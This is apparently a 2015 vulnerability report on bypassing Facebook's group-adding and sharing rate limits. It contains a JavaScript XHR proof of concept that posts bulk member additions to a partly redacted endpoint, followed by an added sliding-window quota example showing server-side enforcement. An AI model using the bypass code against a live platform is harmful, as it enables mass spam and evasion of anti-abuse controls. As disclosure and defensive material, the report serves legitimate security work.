Monday, 3 August 2015


Title
Bypass Facebook Protection/Block System
 
 
 
Description and Impact
 
As you know, the Facebook protection system is built to stop spammers, scammers, etc.
 
Examples:
For groups, there is a limit on adding friends to groups: a user will be blocked if he adds (600 - 1200) of his friends using a script or tool.
 
Also, for sharing to groups, I think the maximum number of shares to groups is 7; after that the user will be blocked from sharing to groups.
 
Anyway, after doing some research, I found that the domain *.facebook.com has no validation controls, or the Facebook system is not configured correctly to work on it.
 
Reproduction Instructions / Proof of Concept
For example, to bypass the limit for adding friends to a single group:
 
- Create an XHR request to add users by using the following URL:
*/groups/members/add/?purposes [hidden for security purposes]
 
 
Code:
var uid = "778218884"; // loop for all friends
var Page = new XMLHttpRequest();
var PageURL = "*a/groups/members/add/?purposes"; // [hidden for security purposes]
var PageParams = "fb_dtsg=AQHR-09syXqn&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&addees%5B"+uid+"%5D="+uid+"&group_id=824691297597477";
Page.open("POST", PageURL, true);
Page.onreadystatechange = function () {
  if (Page.readyState == 4 && Page.status == 200) {
    // request finished; XMLHttpRequest has no close() method, so nothing to call here
  }
};
Page.send(PageParams);
 
The previous code could be run to add 8 friends or more per request, for fast adding.
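
The limits described above only hold if they are enforced on the server per account, across every hostname and endpoint that can perform the action, and counted per member added rather than per request. A sketch of such a check follows as an added example, not code from the original report or from Facebook; the class name, the limit of 20 per 60 seconds, the account id and the example.test routes are all assumptions.

```javascript
// Added defensive example; every name and number here is hypothetical.
// Sliding-window quota for "add member" actions, keyed by the acting account
// only, so every hostname and endpoint that performs the action shares one budget.
class MemberAddQuota {
  constructor(limit, windowMs) {
    this.limit = limit;       // max members one account may add per window
    this.windowMs = windowMs;
    this.events = new Map();  // accountId -> [{ t, cost }]
  }

  // Drop expired entries and return how much of the budget is in use.
  used(accountId, nowMs) {
    const live = (this.events.get(accountId) || [])
      .filter((e) => nowMs - e.t < this.windowMs);
    this.events.set(accountId, live);
    return live.reduce((sum, e) => sum + e.cost, 0);
  }

  // route is returned for audit logging; it is deliberately not part of the key.
  tryConsume(accountId, addees, nowMs, route) {
    const cost = new Set(addees).size; // charge per unique addee, not per request
    const used = this.used(accountId, nowMs);
    if (cost === 0 || used + cost > this.limit) {
      return { allowed: false, used, route };
    }
    this.events.get(accountId).push({ t: nowMs, cost });
    return { allowed: true, used: used + cost, route };
  }
}

// Constructed sample traffic: one account, same action through three routes.
function demo() {
  const quota = new MemberAddQuota(20, 60000);
  const batch = (start, n) => Array.from({ length: n }, (_, i) => "user" + (start + i));
  return [
    quota.tryConsume("acctB", batch(0, 8), 1000, "www.example.test/ui/add"),
    quota.tryConsume("acctB", batch(8, 8), 2000, "m.example.test/xhr/add"),
    quota.tryConsume("acctB", batch(16, 8), 3000, "api.example.test/xhr/add"),
    quota.tryConsume("acctB", batch(16, 4), 4000, "api.example.test/xhr/add"),
    quota.tryConsume("acctB", batch(20, 1), 61500, "www.example.test/ui/add"),
  ];
}

console.log(demo().map((r) => `${r.route} allowed=${r.allowed} used=${r.used}`).join("\n"));
```

The third call is refused even though it arrives through a different route, because the two earlier batches of 8 already used 16 of the 20 slots; the last call succeeds only because the first batch has aged out of the window.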
 
 
POC
 
Account A: used the normal adding method.
Account B: used the bypass exploit. [minute 2:58: exploit executed]
 